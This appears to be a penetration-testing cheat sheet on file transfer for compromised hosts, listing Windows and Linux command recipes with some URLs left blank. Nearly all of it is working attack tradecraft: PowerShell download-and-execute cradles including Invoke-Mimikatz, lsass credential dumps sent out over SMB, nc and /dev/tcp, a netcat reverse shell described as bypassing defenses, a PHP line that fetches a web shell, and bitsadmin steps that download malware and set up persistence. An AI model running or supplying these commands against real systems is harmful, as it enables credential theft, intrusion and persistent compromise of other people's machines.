File Transfer

Basic commands

python -m SimpleHTTPServer 80
php -S

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source " -Destination C:\temp\nc.exe")
powershell.exe wget "" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri -OutFile C:\Users\kostas\Desktop\41020.exe"	
powershell Invoke-WebRequest -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

execute ps1 files

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1

load it into the memory

IEX(New-Object Net.WebClient).downloadString('')
powershell iex(new-object net.webclient).downloadstring(\"\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"\")


echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1


python3 /usr/share/doc/python3-impacket/examples/ a . -smb2support
net view \\
copy \\\a\nc.exe .
copy nc2.exe \\\a\nc2.exe

SMB with password + lsass dump

python3 /usr/share/doc/python3-impacket/examples/ a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMPa.txt.dmp s:

Execute nc via SMB (bypass defenses)

\\\SHARE\nc.exe -nv 4444 -e cmd.exe


ncat -lvp 80 > nc2.exe
nc -nv < nc.exe -w 15

copy files from target to kali

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp

with PHP

echo "<?php file_put_contents('nameOfFile', fopen('', 'r')); ?>" > down2.php

./curl -F 'file=@firefox.exe_190824_231811.dmp' -v


cat > /dev/tcp/10.x.x.x.x/9001
nc -lvp 9001 >

fetch (OpenBSD)

<?php system("fetch -o /usr/local/databases/shell.php; php /usr/local/databases/shell.php"); ?>

rdesktop or remmina

rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>


Download file into the C:\Windows folder.

> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.

Create persistence.

> bitsadmin /create persistence
> bitsadmin /addfile persistence c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

or simply:

python -m SimpleHTTPServer 8080

or HTTPS with upload 😎


Last updated